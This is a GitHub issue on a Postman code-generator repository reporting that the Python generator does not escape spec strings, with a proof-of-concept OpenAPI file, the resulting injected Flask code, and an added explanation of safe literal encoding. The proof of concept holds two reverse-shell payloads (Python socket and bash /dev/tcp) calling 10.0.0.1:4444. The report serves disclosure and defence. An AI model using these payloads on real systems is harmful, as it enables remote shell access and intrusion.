postmanlabs / postman-code-generators

Common repository for all code generators shipped with Postman
Apache License 2.0

Python Code Generator does not encode payloads and could be used to inject malicious code #624

Open awillard1 opened 2 years ago

awillard1 commented 2 years ago

Describe the bug
The Python code generator does not encode payloads and could be used to inject malicious payloads.

To Reproduce
If you create a definition as follows, you can see that the Python code generation does not encode the path data that is sent.

{
    "openapi": "3.0.2",
    "info": {
        "version": "1.0.0",
        "title": "Code",
        "description": "Code Proof of concept"
    },
    "paths": {
        "/nothing/code-PoC', methods=['get']);import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/sh');#": {
            "get": {
                "operationId": "CodeInjection",
                "responses": {
                    "200": {
                        "description": "Let's do this!",
                        "content": {
                            "application/json\"'; bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 | echo \"": {}
                        }
                    }
                }
            }
        }
    }
}

This results in:

from flask import Blueprint, request
from webargs.flaskparser import parser
from marshmallow import Schema, fields
from ..schemas import model
from .. import impl

bp = Blueprint('nothing', __name__)

@bp.route('/nothing/code-PoC', methods=['get']);import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/sh');#', methods=['get'])
def CodeInjection():

    return impl.nothing.CodeInjection()

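The root cause the report describes is a template that drops attacker-controlled text (a path, a media type) between quote characters, so a quote in the input ends the string literal and everything after it becomes Python code. The following is an added example, not code from this issue or from the postman-code-generators project (whose generators are written in JavaScript): it uses a simplified python-requests style template with the assumed names render_vulnerable, render_hardened and is_safe_snippet, and a constructed URL payload that plants a harmless marker instead of the reverse shell from the report. It shows the unsafe interpolation beside the fix (emit a real Python string literal with repr() and allowlist the method), and uses the ast module to prove what each rendering parses into.

```python
import ast

# Constructed sample input modelled on the issue's second payload, which breaks
# out of a double-quoted string. The injected statements are harmless markers
# so the example can be run safely; the report's payload opens a reverse shell.
INJECTED_URL = 'http://example.invalid/code-PoC"; import os; INJECTED = True; _ = "'
CLEAN_URL = "http://example.invalid/nothing/code-PoC"

# Simplified python-requests style snippet template (an assumption for this
# example, not the project's own template).
TEMPLATE = (
    "import requests\n"
    "\n"
    "url = {url_literal}\n"
    "\n"
    "response = requests.request({method_literal}, url)\n"
    "print(response.text)\n"
)

ALLOWED_METHODS = {"GET", "POST", "PUT", "PATCH", "DELETE", "HEAD", "OPTIONS"}


def render_vulnerable(url, method):
    """Drops the raw URL between quote characters, as the issue describes.

    Any '"' in the URL terminates the literal and the rest is parsed as code.
    """
    return TEMPLATE.format(url_literal='"' + url + '"',
                           method_literal='"' + method + '"')


def render_hardened(url, method):
    """Emits a real Python string literal and allowlists the method.

    repr() escapes quotes, backslashes and newlines, so the URL is always a
    single string constant no matter what it contains.
    """
    if method not in ALLOWED_METHODS:
        raise ValueError("unsupported HTTP method: %r" % method)
    return TEMPLATE.format(url_literal=repr(url), method_literal=repr(method))


def statement_kinds(source):
    """Names of the top-level statements the generated snippet parses into."""
    return [type(node).__name__ for node in ast.parse(source).body]


def url_constant(source):
    """The string constant assigned to `url`, or None if it is not a plain constant."""
    for node in ast.parse(source).body:
        if (isinstance(node, ast.Assign)
                and len(node.targets) == 1
                and isinstance(node.targets[0], ast.Name)
                and node.targets[0].id == "url"
                and isinstance(node.value, ast.Constant)
                and isinstance(node.value.value, str)):
            return node.value.value
    return None


def is_safe_snippet(source, expected_url):
    """Generator-side self-check: the snippet contains exactly the statements the
    template emits, and the url constant round-trips to the input."""
    return (statement_kinds(source) == ["Import", "Assign", "Assign", "Expr"]
            and url_constant(source) == expected_url)


if __name__ == "__main__":
    bad = render_vulnerable(INJECTED_URL, "GET")
    print(statement_kinds(bad))      # extra Import and Assign nodes appear
    good = render_hardened(INJECTED_URL, "GET")
    print(is_safe_snippet(good, INJECTED_URL))
```

The same rule applies to every spec-controlled string a generator writes into source (paths, media types, header names and values, operation names): emit it through the target language's literal encoder, or validate it against an allowlist where the grammar is fixed, and never by concatenating quote characters around it. Identifiers such as the operationId need the allowlist treatment rather than escaping, since there is no quoting that makes an arbitrary string a valid function name.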

aarifkhan7 commented 7 months ago

Please assign this to me, I want to work on this issue. @akshaydeo @awillard1